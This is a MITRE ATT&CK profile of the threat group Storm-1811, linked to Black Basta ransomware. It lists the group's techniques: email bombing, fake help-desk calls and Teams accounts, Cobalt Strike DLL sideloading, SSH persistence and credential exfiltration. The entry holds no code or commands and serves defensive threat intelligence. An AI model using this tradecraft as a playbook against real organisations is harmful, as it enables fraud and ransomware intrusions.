G1046 Storm-1811
Storm-1811 is a financially-motivated entity linked to Black Basta ransomware deployment. Storm-1811 is notable for unique phishing and social engineering mechanisms for initial access, such as overloading victim email inboxes with non-malicious spam to prompt a fake “help desk” interaction leading to the deployment of adversary tools and capabilities.1423
| Item | Value |
|---|---|
| ID | G1046 |
| Associated Names | |
| Version | 1.0 |
| Created | 14 March 2025 |
| Last Modified | 14 March 2025 |
| Navigation Layer | View In ATT&CK® Navigator |
Techniques Used
| Domain | ID | Name | Use |
|---|---|---|---|
| enterprise | T1087 | Account Discovery | - |
| enterprise | T1087.002 | Domain Account | Storm-1811 has performed domain account enumeration during intrusions.1 |
| enterprise | T1583 | Acquire Infrastructure | - |
| enterprise | T1583.001 | Domains | Storm-1811 has created domains for use with RMM tools.4 |
| enterprise | T1547 | Boot or Logon Autostart Execution | - |
| enterprise | T1547.001 | Registry Run Keys / Startup Folder | Storm-1811 has created Windows Registry Run keys that execute various batch scripts to establish persistence on victim devices.4 |
| enterprise | T1059 | Command and Scripting Interpreter | - |
| enterprise | T1059.001 | PowerShell | Storm-1811 has used PowerShell for multiple purposes, such as using PowerShell scripts executing in an infinite loop to create an SSH connection to a command and control server.4 |
| enterprise | T1059.003 | Windows Command Shell | Storm-1811 has used multiple batch scripts during initial access and subsequent actions on victim machines.14 |
| enterprise | T1486 | Data Encrypted for Impact | Storm-1811 is a financially-motivated entity linked to the deployment of Black Basta ransomware in victim environments.1 |
| enterprise | T1074 | Data Staged | - |
| enterprise | T1074.001 | Local Data Staging | Storm-1811 has locally staged captured credentials for subsequent manual exfiltration.4 |
| enterprise | T1140 | Deobfuscate/Decode Files or Information | Storm-1811 has distributed password-protected archives such as ZIP files during intrusions.4 |
| enterprise | T1482 | Domain Trust Discovery | Storm-1811 has enumerated domain accounts and access during intrusions.1 |
| enterprise | T1667 | Email Bombing | Storm-1811 has deployed large volumes of non-malicious email spam to victims in order to prompt follow-on interactions with the threat actor posing as IT support or helpdesk to resolve the problem.42 |
| enterprise | T1585 | Establish Accounts | - |
| enterprise | T1585.003 | Cloud Accounts | Storm-1811 has created malicious accounts to enable activity via Microsoft Teams, typically spoofing various IT support and helpdesk themes.1 |
| enterprise | T1048 | Exfiltration Over Alternative Protocol | - |
| enterprise | T1048.002 | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Storm-1811 has exfiltrated captured user credentials via Secure Copy Protocol (SCP).4 |
| enterprise | T1222 | File and Directory Permissions Modification | - |
| enterprise | T1222.001 | Windows File and Directory Permissions Modification | Storm-1811 has used cacls.exe via batch script to modify file and directory permissions in victim environments.4 |
| enterprise | T1574 | Hijack Execution Flow | - |
| enterprise | T1574.001 | DLL | Storm-1811 has deployed a malicious DLL (7z.DLL) that is sideloaded by a modified, legitimate installer (7zG.exe) when that installer is executed with an additional command line parameter of b at runtime to load a Cobalt Strike beacon payload.4 |
| enterprise | T1656 | Impersonation | Storm-1811 impersonates help desk and IT support personnel for phishing and social engineering purposes during initial access to victim environments.1 |
| enterprise | T1105 | Ingress Tool Transfer | Storm-1811 has used scripted cURL commands, BITSAdmin, and other mechanisms to retrieve follow-on batch scripts and tools for execution on victim devices.143 |
| enterprise | T1056 | Input Capture | Storm-1811 has used a PowerShell script to capture user credentials after prompting a user to authenticate to run a malicious script masquerading as a legitimate update item.4 |
| enterprise | T1570 | Lateral Tool Transfer | Storm-1811 has used the Impacket toolset to move and remotely execute payloads to other hosts in victim networks.4 |
| enterprise | T1036 | Masquerading | Storm-1811 has prompted users to download and execute batch scripts that masquerade as legitimate update files during initial access and social engineering operations.4 |
| enterprise | T1036.005 | Match Legitimate Resource Name or Location | Storm-1811 has disguised Cobalt Strike installers as a malicious DLL masquerading as part of a legitimate 7zip installation package.4 |
| enterprise | T1036.010 | Masquerade Account Name | Storm-1811 has created Microsoft Teams accounts that spoof IT support and helpdesk members for use in application and voice phishing.1 |
| enterprise | T1027 | Obfuscated Files or Information | - |
| enterprise | T1027.013 | Encrypted/Encoded File | Storm-1811 XOR encodes a Cobalt Strike installation payload in a DLL file that is decoded with a hardcoded key when called by a legitimate 7zip installation process.4 |
| enterprise | T1588 | Obtain Capabilities | - |
| enterprise | T1588.002 | Tool | Storm-1811 acquired various legitimate and malicious tools, such as RMM software and commodity malware packages, for operations.14 |
| enterprise | T1566 | Phishing | - |
| enterprise | T1566.002 | Spearphishing Link | Storm-1811 has distributed malicious links to victims that redirect to EvilProxy-based phishing sites to harvest credentials.1 |
| enterprise | T1566.003 | Spearphishing via Service | Storm-1811 has used Microsoft Teams to send messages and initiate voice calls to victims posing as IT support personnel.1 |
| enterprise | T1566.004 | Spearphishing Voice | Storm-1811 has initiated voice calls with victims posing as IT support to prompt users to download and execute scripts and other tools for initial access.142 |
| enterprise | T1219 | Remote Access Tools | - |
| enterprise | T1219.002 | Remote Desktop Software | Storm-1811 has abused multiple types of legitimate remote access software and tools, such as ScreenConnect, NetSupport Manager, and AnyDesk.14 |
| enterprise | T1021 | Remote Services | - |
| enterprise | T1021.002 | SMB/Windows Admin Shares | Storm-1811 has attempted to move laterally in victim environments via SMB using Impacket.4 |
| enterprise | T1021.004 | SSH | Storm-1811 has used OpenSSH to establish an SSH tunnel to victims for persistent access.1 |
| enterprise | T1033 | System Owner/User Discovery | Storm-1811 has used whoami.exe to determine if the active user on a compromised system is an administrator.4 |
| enterprise | T1204 | User Execution | - |
| enterprise | T1204.002 | Malicious File | Storm-1811 has prompted users to execute downloaded software and payloads as the result of social engineering activity.142 |
Software
References
-
Microsoft Threat Intelligence. (2024, May 15). Threat actors misusing Quick Assist in social engineering attacks leading to ransomware. Retrieved March 14, 2025. ↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩
-
Red Canary Intelligence. (2024, December 2). Storm-1811 exploits RMM tools to drop Black Basta ransomware. Retrieved March 14, 2025. ↩↩↩↩
-
The Red Canary Team. (2024, June 20). Intelligence Insights: June 2024. Retrieved March 14, 2025. ↩↩↩
-
Tyler McGraw, Thomas Elkins, and Evan McCann. (2024, May 10). Ongoing Social Engineering Campaign Linked to Black Basta Ransomware Operators. Retrieved January 31, 2025. ↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩